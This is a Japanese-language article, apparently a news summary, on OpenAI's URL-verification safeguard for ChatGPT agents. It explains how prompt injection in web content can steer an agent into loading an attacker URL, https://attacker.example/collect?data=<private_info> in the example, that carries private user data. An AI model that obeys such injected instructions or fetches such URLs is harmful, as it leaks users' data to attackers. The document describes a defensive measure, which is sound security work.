OpenAI AI エージェント リンク セーフティ
OpenAIは、URLを通じて機密ユーザーデータが漏洩するのを防ぐため、新しいセキュリティ対策を導入しました。ウェブ上で既に公開されているアドレスのみに自動的なURL取得を制限することで、ChatGPTにおけるエージェント体験に関連するURLベースのデータ漏洩リスクを軽減することを目的としています。
URLベースのデータ漏洩の防止
AIエージェントは、クエリパラメータとして埋め込まれたメールアドレスやドキュメントタイトルなどの機密ユーザー情報を含むURLをリクエストするように操作される可能性があります。ウェブサイトはサーバーログにリクエストされたURLを記録するため、モデルがチャットで機密情報を明示的に出力しなくても、攻撃者はこのプライベートデータをキャプチャできます。
このリスクは、プロンプトインジェクション技術によって増幅されます。攻撃者はウェブコンテンツに指示を配置し、モデルの動作を上書きしてエージェントが特定の悪意のあるURL(例: https://attacker.example/collect?data=<private_info>)をロードするように強制します。
従来のトラストリストの制限
OpenAIは、単純な「信頼できるサイトリスト」または許可リストが、主に以下の2つの理由で不十分であると指摘しています。
- Redirects: 信頼できるドメインで始まるリンクでも、攻撃者が制御する宛先にリダイレクトされる可能性があります。
- User Experience: 厳格な許可リストは過度の摩擦と「誤警報」を生み出し、これによりユーザーはセキュリティ警告を無視する可能性があります。
代わりにドメインの評判に焦点を当てるのではなく、OpenAIのアプローチは特定のURLが自動的に取得しても安全かどうかに焦点を当てます。
公開URL検証システム
URLにユーザー固有の機密情報が含まれていないことを確認するため、OpenAIはユーザーの会話、アカウント、または個人データにアクセスせずに公開URLを発見する独立したウェブインデックス(クローラー)を利用します。
エージェントが自動的にURLを取得しようとすると、システムはこのインデックスとURLを照合します。
- Verified Public URLs: URLが以前に観測された公開URLと一致する場合、エージェントはそれを自動的に読み込みます。
- Unverified URLs: 一致するものが見つからない場合、URLは未検証として扱われます。エージェントは別のサイトを試すように指示されるか、システムは警告ダイアログを通じて明示的なユーザーアクションを要求する可能性があります。
ユーザーインターフェイスとコントロール
リンクが公開として検証できない場合、ユーザーはそのリンクが検証されておらず、サードパーティーサイトと会話データを共有する可能性があるという警告を目にすることがあります。これにより、ユーザーの知識なしにバックグラウンドでリソースがロードされる可能性のある「静かなリーク」を防止します。
範囲とディフェンス・イン・デプス
このセーフガードは、リソース取得中にURL自身を通じたユーザー固有のデータ漏洩を防ぐために特別に設計されています。これはすべてのウェブセキュリティ問題に対する包括的なソリューションではありません。具体的には、以下を保証しません:
- ウェブページ上のコンテンツの信頼性。
- ソーシャルエンジニアリングに対する保護。
- ページ上の誤解を招くまたは有害な指示の存在。
OpenAIはこれを、プロンプトインジェクションに対するモデルレベルの緩和策、製品コントロール、監視、継続的なレッドチーム演習を含む広範なディフェンス・イン・デプス戦略の一部として扱います。